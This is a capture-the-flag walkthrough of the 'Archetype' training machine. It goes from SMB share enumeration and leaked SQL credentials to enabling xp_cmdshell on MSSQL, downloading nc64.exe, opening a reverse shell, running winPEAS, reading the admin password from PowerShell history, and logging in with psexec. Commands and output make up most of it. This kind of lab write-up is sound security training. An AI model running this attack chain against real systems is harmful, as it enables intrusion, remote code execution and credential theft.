First, check out the open tcp ports. Exchange ip with the machines IP address.
sudo nmap -sV ip
Let's list the available shares on this machine:
smbclient -L ip
Let's try to open the share "backups":
to list files and folders. Relevant is this file:
prod.dtsConfig AR 609 Mon Jan 20 07:23:02 2020
Let's download and open it:
get prod.dtsConfig ctrl + c // to close the share cat prod.dtsConfig
<DTSConfiguration> <DTSConfigurationHeading> <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/> </DTSConfigurationHeading> <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String"> <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue> </Configuration> </DTSConfiguration>
We receive a password in clear text (M3g4c0rp123), the user (sql_svc) and the host (ARCHETYPE).
We will use mssqlclient.py of the Impacket tool. Installing it:
git clone https://github.com/SecureAuthCorp/impacket.git cd impacket sudo python3 setup.py install cd examples
Then we run the tool to connect. Exchange ip with your machines IP address
python3 mssqlclient.py ARCHETYPE/sql_svc@ip -windows-auth
Paste in the password from above and hit enter. We are now logged in! Let's check what role we have on the SQL server:
The result is "1", which stands for "true". Let's see if xp_cmdshell is activated:
EXEC xp_cmdshell 'net user';
It is not activated yet, so this is what we do now:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; sp_configure; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
We may now execute system commands, like:
This produces the following result:
output ----------------- archetype\sql_svc
Now we want to get a reverse shell. For this we want to upload an executable named nc64.exe.
Open a new terminal and start a HTTP server:
cd /Downloads wget https://github.com/int0x33/nc.exe/blob/master/nc64.exe ifconfig tun0 //to get the ip address (inet) for a later action sudo python3 -m http.server 80
Then open yet another terminal and start netcat, to listen on port 443:
sudo nc -lvnp 443
Now we go back to the SQL terminal and run
xp_cmdshell "powershell -c pwd"
The output is something like
We currently don't have the privilege to write in a system directory, so we change the directory to somewhere we can write. We will use the Downloads directory. Please exchange ip with the IP address received from running "ifconfig tun0" before (the inet one).
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://ip/nc64.exe -outfile nc64.exe"
In the terminal with the running HTTP server, it should display something like
ip - - [21/May/2023 12:51:36] "GET /nc64.exe HTTP/1.1" 200 -
Now, run this in the SQL terminal:
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe ip 443"
We should now have our reverse shell in the Ncat terminal window:
listening on [any] 443 ... connect to [10.10.14.126] from (UNKNOWN) [10.129.95.187] 49685 Microsoft Windows [Version 10.0.17763.2061] (c) 2018 Microsoft Corporation. All rights reserved.
To get the user flag, run
cd .. cd Desktop type user.txt
To get the admin flag, we need to do privilege escalation with the winPEAS tool. We will download it the same way, we downloaded the nc64.exe file.
Stop the server, download it and restart the server:
ctrl + c wget https://github.com/carlospolop/PEASS-ng/releases/download/refs%2Fpull%2F260%2Fmerge/winPEASx64.exe sudo python3 -m http.server 80
Then in the SQL terminal run (exchange ip with the server ip (ifconfig tun0, inet):
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://ip/winPEASx64.exe -outfile winPEASx64.exe"
We can see it worked in the server terminal
ip - - [22/May/2023 14:05:12] "GET /winPEASx64.exe HTTP/1.1" 200 -
Now in the reverse shell terminal window, we can navigate to the executable and run it:
cd .. cd Downloads .\winPEASx64.exe
A long output should be prompted. The interesting part is this:
So, let's navigate there and view the content.
cd .. cd AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline type ConsoleHost_history.txt
type ConsoleHost_history.txt net.exe use T: \Archetype\backups /user:administrator MEGACORP_4dm1n!! exit
So now we got the admin password in clear text: MEGACORP_4dm1n!!
Connect (replace ip with your machines IP address:
cd impacked/examples python3 psexec.py administrator@ip
And get the admin flag:
cd .. cd .. cd Users\Administrator\Desktop type root.txt